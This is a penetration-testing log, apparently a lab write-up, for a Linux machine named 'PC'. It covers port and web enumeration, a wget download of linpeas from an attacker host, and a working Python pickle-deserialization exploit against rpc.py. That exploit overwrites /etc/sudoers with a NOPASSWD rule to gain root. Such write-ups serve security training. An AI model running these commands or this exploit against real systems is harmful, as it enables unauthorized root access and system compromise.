PC
๐งช Pentest Log: {{date:2025-08-02}}
๐ Target Information
- Machine Name: PC
- IP Address: 192.168.123.210
- Operating System: Linux
ip=192.168.123.210
๐ก Enumeration
๐ Port Scanning
Command Used
ports=$(nmap -p- --min-rate=1000 -T4 $ip | grep '^[0-9]' | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//)
nmap -p$ports -sC -sV $ip -oN tcp_scan_result.txt
nmap -sU --top-ports 100 $ip -oN udp_scan_result.txt
Port 8000
8000/tcp open http ttyd 1.7.3-a2312cb (libwebsockets 3.2.0)
|_http-server-header: ttyd/1.7.3-a2312cb (libwebsockets/3.2.0)
|_http-title: ttyd - Terminal
Web Content Enumeration
gobuster dir -u http://$ip:8000 -w /usr/share/seclists/Discovery/Web-Content/common.txt
dirsearch -u http://$ip:8000 -r -o dirsearch.txt
๐ฃ Exploitation
๐ Vulnerability Summary
- Service / Port: 22
- Vulnerability Type: N/A
๐ Exploit Execution
๐ง Exploit Method
Tool / Script Used:
N/A
๐งฌ Privilege Escalation
๐ค Current Access
- User: bob
- Groups: bob
- Shell Type: ssh
๐ Enumeration
Linpeas:
wget http://192.168.45.196:443/linpeas.sh
chmod +x linpeas.sh
./linpeas.sh
found root running
/opt/rpc.py
google rpc.py exploit
๐ Privilege Escalation Exploit
๐ Exploit Summary
- Technique Used: Public Exploit
- Target Binary/Service: rpc.py
- Reference / Source: ExploitDB
๐ง Exploit Steps
- Setup
vim exploit.py
import requests
import pickle
# Unauthenticated RCE 0-day for https://github.com/abersheeran/rpc.py
HOST = "127.0.0.1:65432"
URL = f"http://{HOST}/sayhi"
HEADERS = {
"serializer": "pickle"
}
def generate_payload(cmd):
class PickleRce(object):
def __reduce__(self):
import os
return os.system, (cmd,)
payload = pickle.dumps(PickleRce())
print(payload)
return payload
def exec_command(cmd):
payload = generate_payload(cmd)
requests.post(url=URL, data=payload, headers=HEADERS)
def main():
exec_command('echo "user ALL=(root) NOPASSWD: ALL" > /etc/sudoers')
# exec_command('uname -a')
if __name__ == "__main__":
main()
- Smash to root
python3 exploit.py
sudo su -